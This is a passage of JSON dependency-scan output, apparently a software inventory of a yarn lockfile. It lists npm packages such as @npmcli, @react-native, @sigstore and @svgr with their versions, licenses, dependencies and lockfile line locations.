"@npmcli/package-json@7.0.1", "Name": "@npmcli/package-json", "Identifier": { "PURL": "pkg:npm/%40npmcli/package-json@7.0.1", "UID": "601e09b38638788d" }, "Version": "7.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/git@7.0.0", "glob@11.0.3", "hosted-git-info@9.0.2", "json-parse-even-better-errors@4.0.0", "proc-log@5.0.0", "semver@7.7.3", "validate-npm-package-license@3.0.4" ], "Locations": [ { "StartLine": 2062, "EndLine": 2071 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/promise-spawn@8.0.3", "Name": "@npmcli/promise-spawn", "Identifier": { "PURL": "pkg:npm/%40npmcli/promise-spawn@8.0.3", "UID": "7ae8d743a351020d" }, "Version": "8.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "which@5.0.0" ], "Locations": [ { "StartLine": 2073, "EndLine": 2076 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/query@4.0.1", "Name": "@npmcli/query", "Identifier": { "PURL": "pkg:npm/%40npmcli/query@4.0.1", "UID": "246684be929a32de" }, "Version": "4.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "postcss-selector-parser@7.1.0" ], "Locations": [ { "StartLine": 2078, "EndLine": 2081 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/redact@3.2.2", "Name": "@npmcli/redact", "Identifier": { "PURL": "pkg:npm/%40npmcli/redact@3.2.2", "UID": "42eb53e40e94f87e" }, "Version": "3.2.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2083, "EndLine": 2084 } ], "AnalyzedBy": "yarn" }, { "ID": "@npmcli/run-script@10.0.0", "Name": "@npmcli/run-script", "Identifier": { "PURL": "pkg:npm/%40npmcli/run-script@10.0.0", "UID": "9b01267ac36e7d06" }, "Version": "10.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@npmcli/node-gyp@4.0.0", "@npmcli/package-json@7.0.1", "@npmcli/promise-spawn@8.0.3", "node-gyp@11.4.2", "proc-log@5.0.0", "which@5.0.0" ], "Locations": [ { "StartLine": 2086, "EndLine": 2094 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/aspromise@1.1.2", "Name": "@protobufjs/aspromise", "Identifier": { "PURL": "pkg:npm/%40protobufjs/aspromise@1.1.2", "UID": "2f3df6b54fd354d5" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2101, "EndLine": 2104 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/base64@1.1.2", "Name": "@protobufjs/base64", "Identifier": { "PURL": "pkg:npm/%40protobufjs/base64@1.1.2", "UID": "8022cb1615e3db6e" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2106, "EndLine": 2109 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/codegen@2.0.4", "Name": "@protobufjs/codegen", "Identifier": { "PURL": "pkg:npm/%40protobufjs/codegen@2.0.4", "UID": "bcdbd8b14ac9c1f" }, "Version": "2.0.4", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2111, "EndLine": 2114 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/eventemitter@1.1.0", "Name": "@protobufjs/eventemitter", "Identifier": { "PURL": "pkg:npm/%40protobufjs/eventemitter@1.1.0", "UID": "df0f80a183844744" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2116, "EndLine": 2119 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/fetch@1.1.0", "Name": "@protobufjs/fetch", "Identifier": { "PURL": "pkg:npm/%40protobufjs/fetch@1.1.0", "UID": "6c5dbdb00db509f5" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@protobufjs/aspromise@1.1.2", "@protobufjs/inquire@1.1.0" ], "Locations": [ { "StartLine": 2121, "EndLine": 2127 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/float@1.0.2", "Name": "@protobufjs/float", "Identifier": { "PURL": "pkg:npm/%40protobufjs/float@1.0.2", "UID": "7a646071f8d30d85" }, "Version": "1.0.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2129, "EndLine": 2132 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/inquire@1.1.0", "Name": "@protobufjs/inquire", "Identifier": { "PURL": "pkg:npm/%40protobufjs/inquire@1.1.0", "UID": "9294096b2d8a9fad" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2134, "EndLine": 2137 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/path@1.1.2", "Name": "@protobufjs/path", "Identifier": { "PURL": "pkg:npm/%40protobufjs/path@1.1.2", "UID": "631f8e34b90d69f5" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2139, "EndLine": 2142 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/pool@1.1.0", "Name": "@protobufjs/pool", "Identifier": { "PURL": "pkg:npm/%40protobufjs/pool@1.1.0", "UID": "d4897049d26fe9a9" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2144, "EndLine": 2147 } ], "AnalyzedBy": "yarn" }, { "ID": "@protobufjs/utf8@1.1.0", "Name": "@protobufjs/utf8", "Identifier": { "PURL": "pkg:npm/%40protobufjs/utf8@1.1.0", "UID": "9dc5dd41539a0503" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2149, "EndLine": 2152 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-community/cli-config-android@18.0.0", "Name": "@react-native-community/cli-config-android", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-config-android@18.0.0", "UID": "5377857a5d32b12b" }, "Version": "18.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-tools@18.0.0", "chalk@4.1.2", "fast-glob@3.3.3", "fast-xml-parser@4.5.3" ], "Locations": [ { "StartLine": 2181, "EndLine": 2189 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-community/cli-config-apple@18.0.0", "Name": "@react-native-community/cli-config-apple", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-config-apple@18.0.0", "UID": "2c398df1cc29133c" }, "Version": "18.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-tools@18.0.0", "chalk@4.1.2", "execa@5.1.1", "fast-glob@3.3.3" ], "Locations": [ { "StartLine": 2201, "EndLine": 2209 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native-community/cli-tools@18.0.0", "Name": "@react-native-community/cli-tools", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-tools@18.0.0", "UID": "6a3789b84ab0c7d5" }, "Version": "18.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@vscode/sudo-prompt@9.3.1", "appdirsjs@1.2.7", "chalk@4.1.2", "execa@5.1.1", "find-up@5.0.0", "launch-editor@2.11.1", "mime@2.6.0", "ora@5.4.1", "prompts@2.4.2", "semver@7.7.3" ], "Locations": [ { "StartLine": 2299, "EndLine": 2313 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/assets-registry@0.81.0", "Name": "@react-native/assets-registry", "Identifier": { "PURL": "pkg:npm/%40react-native/assets-registry@0.81.0", "UID": "d3e05c8ef9c4f324" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2412, "EndLine": 2415 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/codegen@0.81.0", "Name": "@react-native/codegen", "Identifier": { "PURL": "pkg:npm/%40react-native/codegen@0.81.0", "UID": "76216d685201fd8f" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "glob@7.2.3", "hermes-parser@0.29.1", "invariant@2.2.4", "nullthrows@1.1.1", "yargs@17.7.2" ], "Locations": [ { "StartLine": 2476, "EndLine": 2485 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/community-cli-plugin@0.81.0", "Name": "@react-native/community-cli-plugin", "Identifier": { "PURL": "pkg:npm/%40react-native/community-cli-plugin@0.81.0", "UID": "1dbc59a7c7400284" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native/dev-middleware@0.81.0", "debug@4.4.3", "invariant@2.2.4", "metro@0.83.3", "metro-config@0.83.3", "metro-core@0.83.3", "semver@7.7.3" ], "Locations": [ { "StartLine": 2487, "EndLine": 2498 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/debugger-frontend@0.81.0", "Name": "@react-native/debugger-frontend", "Identifier": { "PURL": "pkg:npm/%40react-native/debugger-frontend@0.81.0", "UID": "a236c31cf29efefc" }, "Version": "0.81.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2500, "EndLine": 2503 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/dev-middleware@0.81.0", "Name": "@react-native/dev-middleware", "Identifier": { "PURL": "pkg:npm/%40react-native/dev-middleware@0.81.0", "UID": "7d7e8981544710bf" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/ttlcache@1.4.1", "@react-native/debugger-frontend@0.81.0", "chrome-launcher@0.15.2", "chromium-edge-launcher@0.2.0", "connect@3.7.0", "debug@4.4.3", "invariant@2.2.4", "nullthrows@1.1.1", "open@7.4.2", "serve-static@1.16.2", "ws@6.2.3" ], "Locations": [ { "StartLine": 2505, "EndLine": 2520 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/gradle-plugin@0.81.0", "Name": "@react-native/gradle-plugin", "Identifier": { "PURL": "pkg:npm/%40react-native/gradle-plugin@0.81.0", "UID": "1c676cdcc4c728a" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2545, "EndLine": 2548 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/js-polyfills@0.81.0", "Name": "@react-native/js-polyfills", "Identifier": { "PURL": "pkg:npm/%40react-native/js-polyfills@0.81.0", "UID": "f03605cfe61c89f4" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2550, "EndLine": 2553 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/normalize-colors@0.73.2", "Name": "@react-native/normalize-colors", "Identifier": { "PURL": "pkg:npm/%40react-native/normalize-colors@0.73.2", "UID": "bc0ea1e933b8c969" }, "Version": "0.73.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2580, "EndLine": 2583 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/normalize-colors@0.81.0", "Name": "@react-native/normalize-colors", "Identifier": { "PURL": "pkg:npm/%40react-native/normalize-colors@0.81.0", "UID": "31c7f3e2978509a0" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2585, "EndLine": 2588 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-native/virtualized-lists@0.81.0", "Name": "@react-native/virtualized-lists", "Identifier": { "PURL": "pkg:npm/%40react-native/virtualized-lists@0.81.0", "UID": "c973774c0fe413e3" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "invariant@2.2.4", "nullthrows@1.1.1" ], "Locations": [ { "StartLine": 2595, "EndLine": 2601 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-navigation/core@7.17.1", "Name": "@react-navigation/core", "Identifier": { "PURL": "pkg:npm/%40react-navigation/core@7.17.1", "UID": "47aa15320c981e2a" }, "Version": "7.17.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-navigation/routers@7.5.3", "escape-string-regexp@4.0.0", "fast-deep-equal@3.1.3", "nanoid@3.3.11", "query-string@7.1.3", "react-is@19.2.4", "use-latest-callback@0.2.5", "use-sync-external-store@1.6.0" ], "Locations": [ { "StartLine": 2603, "EndLine": 2615 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-navigation/elements@2.9.13", "Name": "@react-navigation/elements", "Identifier": { "PURL": "pkg:npm/%40react-navigation/elements@2.9.13", "UID": "9f7f1c669a07f6e7" }, "Version": "2.9.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color@4.2.3", "use-latest-callback@0.2.5", "use-sync-external-store@1.6.0" ], "Locations": [ { "StartLine": 2627, "EndLine": 2634 } ], "AnalyzedBy": "yarn" }, { "ID": "@react-navigation/routers@7.5.3", "Name": "@react-navigation/routers", "Identifier": { "PURL": "pkg:npm/%40react-navigation/routers@7.5.3", "UID": "bb3f706e42b51d6a" }, "Version": "7.5.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "nanoid@3.3.11" ], "Locations": [ { "StartLine": 2656, "EndLine": 2661 } ], "AnalyzedBy": "yarn" }, { "ID": "@sigstore/bundle@4.0.0", "Name": "@sigstore/bundle", "Identifier": { "PURL": "pkg:npm/%40sigstore/bundle@4.0.0", "UID": "fdc0a5c8c1d83c2c" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/protobuf-specs@0.5.0" ], "Locations": [ { "StartLine": 2688, "EndLine": 2693 } ], "AnalyzedBy": "yarn" }, { "ID": "@sigstore/core@3.0.0", "Name": "@sigstore/core", "Identifier": { "PURL": "pkg:npm/%40sigstore/core@3.0.0", "UID": "f715328e030b255b" }, "Version": "3.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2695, "EndLine": 2696 } ], "AnalyzedBy": "yarn" }, { "ID": "@sigstore/protobuf-specs@0.5.0", "Name": "@sigstore/protobuf-specs", "Identifier": { "PURL": "pkg:npm/%40sigstore/protobuf-specs@0.5.0", "UID": "39a6fd9ffc663d37" }, "Version": "0.5.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2698, "EndLine": 2701 } ], "AnalyzedBy": "yarn" }, { "ID": "@sigstore/sign@4.0.1", "Name": "@sigstore/sign", "Identifier": { "PURL": "pkg:npm/%40sigstore/sign@4.0.1", "UID": "257eaee4e160ae2c" }, "Version": "4.0.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/bundle@4.0.0", "@sigstore/core@3.0.0", "@sigstore/protobuf-specs@0.5.0", "make-fetch-happen@15.0.2", "proc-log@5.0.0", "promise-retry@2.0.1" ], "Locations": [ { "StartLine": 2703, "EndLine": 2711 } ], "AnalyzedBy": "yarn" }, { "ID": "@sigstore/tuf@4.0.0", "Name": "@sigstore/tuf", "Identifier": { "PURL": "pkg:npm/%40sigstore/tuf@4.0.0", "UID": "5a4831c7e9e267b2" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/protobuf-specs@0.5.0", "tuf-js@4.0.0" ], "Locations": [ { "StartLine": 2713, "EndLine": 2717 } ], "AnalyzedBy": "yarn" }, { "ID": "@sigstore/verify@3.0.0", "Name": "@sigstore/verify", "Identifier": { "PURL": "pkg:npm/%40sigstore/verify@3.0.0", "UID": "82dcdb5c3b8bd0d2" }, "Version": "3.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/bundle@4.0.0", "@sigstore/core@3.0.0", "@sigstore/protobuf-specs@0.5.0" ], "Locations": [ { "StartLine": 2719, "EndLine": 2724 } ], "AnalyzedBy": "yarn" }, { "ID": "@sinclair/typebox@0.27.8", "Name": "@sinclair/typebox", "Identifier": { "PURL": "pkg:npm/%40sinclair/typebox@0.27.8", "UID": "a2c7f773ff725a1b" }, "Version": "0.27.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2726, "EndLine": 2729 } ], "AnalyzedBy": "yarn" }, { "ID": "@sinonjs/commons@3.0.1", "Name": "@sinonjs/commons", "Identifier": { "PURL": "pkg:npm/%40sinonjs/commons@3.0.1", "UID": "8058503cd053a6ee" }, "Version": "3.0.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "type-detect@4.0.8" ], "Locations": [ { "StartLine": 2731, "EndLine": 2736 } ], "AnalyzedBy": "yarn" }, { "ID": "@sinonjs/fake-timers@10.3.0", "Name": "@sinonjs/fake-timers", "Identifier": { "PURL": "pkg:npm/%40sinonjs/fake-timers@10.3.0", "UID": "6d87858e0c014694" }, "Version": "10.3.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sinonjs/commons@3.0.1" ], "Locations": [ { "StartLine": 2738, "EndLine": 2743 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/babel-plugin-add-jsx-attribute@8.0.0", "Name": "@svgr/babel-plugin-add-jsx-attribute", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-add-jsx-attribute@8.0.0", "UID": "a6a90f93b05e2ff1" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2745, "EndLine": 2748 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/babel-plugin-remove-jsx-attribute@8.0.0", "Name": "@svgr/babel-plugin-remove-jsx-attribute", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-remove-jsx-attribute@8.0.0", "UID": "3b504694c2f30024" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2750, "EndLine": 2753 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", "Name": "@svgr/babel-plugin-remove-jsx-empty-expression", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", "UID": "704500cb2afa3143" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2755, "EndLine": 2758 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", "Name": "@svgr/babel-plugin-replace-jsx-attribute-value", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", "UID": "593997112d7157e9" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2760, "EndLine": 2763 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/babel-plugin-svg-dynamic-title@8.0.0", "Name": "@svgr/babel-plugin-svg-dynamic-title", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-svg-dynamic-title@8.0.0", "UID": "a6fc85e19612f1e6" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2765, "EndLine": 2768 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/babel-plugin-svg-em-dimensions@8.0.0", "Name": "@svgr/babel-plugin-svg-em-dimensions", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-svg-em-dimensions@8.0.0", "UID": "be233c079cd8711b" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2770, "EndLine": 2773 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/babel-plugin-transform-react-native-svg@8.1.0", "Name": "@svgr/babel-plugin-transform-react-native-svg", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-transform-react-native-svg@8.1.0", "UID": "ec761ff01b67bc16" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2775, "EndLine": 2778 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/babel-plugin-transform-svg-component@8.0.0", "Name": "@svgr/babel-plugin-transform-svg-component", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-transform-svg-component@8.0.0", "UID": "b964f3b84122a1f6" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2780, "EndLine": 2783 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/babel-preset@8.1.0", "Name": "@svgr/babel-preset", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-preset@8.1.0", "UID": "73179374b8c54c53" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@svgr/babel-plugin-add-jsx-attribute@8.0.0", "@svgr/babel-plugin-remove-jsx-attribute@8.0.0", "@svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", "@svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", "@svgr/babel-plugin-svg-dynamic-title@8.0.0", "@svgr/babel-plugin-svg-em-dimensions@8.0.0", "@svgr/babel-plugin-transform-react-native-svg@8.1.0", "@svgr/babel-plugin-transform-svg-component@8.0.0" ], "Locations": [ { "StartLine": 2785, "EndLine": 2797 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/core@8.1.0", "Name": "@svgr/core", "Identifier": { "PURL": "pkg:npm/%40svgr/core@8.1.0", "UID": "7492ec3dffa26d0e" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@svgr/babel-preset@8.1.0", "camelcase@6.3.0", "cosmiconfig@8.3.6", "snake-case@3.0.4" ], "Locations": [ { "StartLine": 2799, "EndLine": 2808 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/hast-util-to-babel-ast@8.0.0", "Name": "@svgr/hast-util-to-babel-ast", "Identifier": { "PURL": "pkg:npm/%40svgr/hast-util-to-babel-ast@8.0.0", "UID": "748d2c3187817806" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4", "entities@4.5.0" ], "Locations": [ { "StartLine": 2810, "EndLine": 2816 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/plugin-jsx@8.1.0", "Name": "@svgr/plugin-jsx", "Identifier": { "PURL": "pkg:npm/%40svgr/plugin-jsx@8.1.0", "UID": "98486a121c9db39c" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@svgr/babel-preset@8.1.0", "@svgr/hast-util-to-babel-ast@8.0.0", "svg-parser@2.0.4" ], "Locations": [ { "StartLine": 2818, "EndLine": 2826 } ], "AnalyzedBy": "yarn" }, { "ID": "@svgr/plugin-svgo@8.1.0", "Name": "@svgr/plugin-svgo", "Identifier": { "PURL": "pkg:npm/%40svgr/plugin-svgo@8.1.0", "UID": "c49d4a6af035c833" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "cosmiconfig@8.3.6", "deepmerge@4.3.1", "svgo@3.3.2" ], "Locations": [ { "StartLine": 2828, "EndLine": 2835 } ], "AnalyzedBy": "yarn" }, { "ID": "@trysound/sax@0.2.0", "Name": "@trysound/sax", "Identifier": { "PURL": "pkg:npm/%40trysound/sax@0.2.0", "UID": "37b619dbd22dcbb4" }, "Version": "0.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2842, "EndLine": 2845 } ], "AnalyzedBy": "yarn" }, { "ID": "@tufjs/canonical-json@2.0.0", "Name": "@tufjs/canonical-json", "Identifier": { "PURL": "pkg:npm/%40tufjs/canonical-json@2.0.0", "UID": "eda9e081767daad3" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2847, "EndLine": 2850 } ], "AnalyzedBy": "yarn" }, { "ID": "@tufjs/models@4.0.0", "Name": "@tufjs/models", "Identifier": { "PURL": "pkg:npm/%40tufjs/models@4.0.0", "UID": "8e8d04160d29d4a7" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@tufjs/canonical-json@2.0.0", "minimatch@9.0.5" ], "Locations": [ { "StartLine": 2852, "EndLine": 2856 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/babel__core@7.20.5", "Name": "@types/babel__core", "Identifier": { "PURL": "pkg:npm/%40types/babel__core@7.20.5", "UID": "c8d4aeb1ed9c55c8" }, "Version": "7.20.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/parser@7.28.4", "@babel/types@7.28.4", "@types/babel__generator@7.27.0", "@types/babel__template@7.4.4", "@types/babel__traverse@7.28.0" ], "Locations": [ { "StartLine": 2858, "EndLine": 2867 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/babel__generator@7.27.0", "Name": "@types/babel__generator", "Identifier": { "PURL": "pkg:npm/%40types/babel__generator@7.27.0", "UID": "1fbd0e1463860d0a" }, "Version": "7.27.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 2869, "EndLine": 2874 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/babel__template@7.4.4", "Name": "@types/babel__template", "Identifier": { "PURL": "pkg:npm/%40types/babel__template@7.4.4", "UID": "94cc5dc5d46bcbff" }, "Version": "7.4.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/parser@7.28.4", "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 2876, "EndLine": 2882 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/babel__traverse@7.28.0", "Name": "@types/babel__traverse", "Identifier": { "PURL": "pkg:npm/%40types/babel__traverse@7.28.0", "UID": "f29af34ed517af1c" }, "Version": "7.28.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4" ], "Locations": [ { "StartLine": 2884, "EndLine": 2889 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/geojson@7946.0.16", "Name": "@types/geojson", "Identifier": { "PURL": "pkg:npm/%40types/geojson@7946.0.16", "UID": "59b1f14cb6f11ccc" }, "Version": "7946.0.16", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2891, "EndLine": 2894 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/graceful-fs@4.1.9", "Name": "@types/graceful-fs", "Identifier": { "PURL": "pkg:npm/%40types/graceful-fs@4.1.9", "UID": "d25dc5f8de9ecfa5" }, "Version": "4.1.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@24.7.0" ], "Locations": [ { "StartLine": 2896, "EndLine": 2901 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/hammerjs@2.0.46", "Name": "@types/hammerjs", "Identifier": { "PURL": "pkg:npm/%40types/hammerjs@2.0.46", "UID": "4dbd44ca99cf53a3" }, "Version": "2.0.46", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2903, "EndLine": 2906 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/istanbul-lib-coverage@2.0.6", "Name": "@types/istanbul-lib-coverage", "Identifier": { "PURL": "pkg:npm/%40types/istanbul-lib-coverage@2.0.6", "UID": "812fbadc41e9e493" }, "Version": "2.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2908, "EndLine": 2911 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/istanbul-lib-report@3.0.3", "Name": "@types/istanbul-lib-report", "Identifier": { "PURL": "pkg:npm/%40types/istanbul-lib-report@3.0.3", "UID": "41bb742ed03ea1fe" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/istanbul-lib-coverage@2.0.6" ], "Locations": [ { "StartLine": 2913, "EndLine": 2918 } ], "AnalyzedBy": "yarn" }, { "ID": "@types/istanbul-reports@3.0.4", "Name": "@types/istanbul-reports", "Identifier": { "PURL": "pkg:npm/%40types/istanbul-reports@3.0.4", "UID": "cad32a184eba69ad" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ 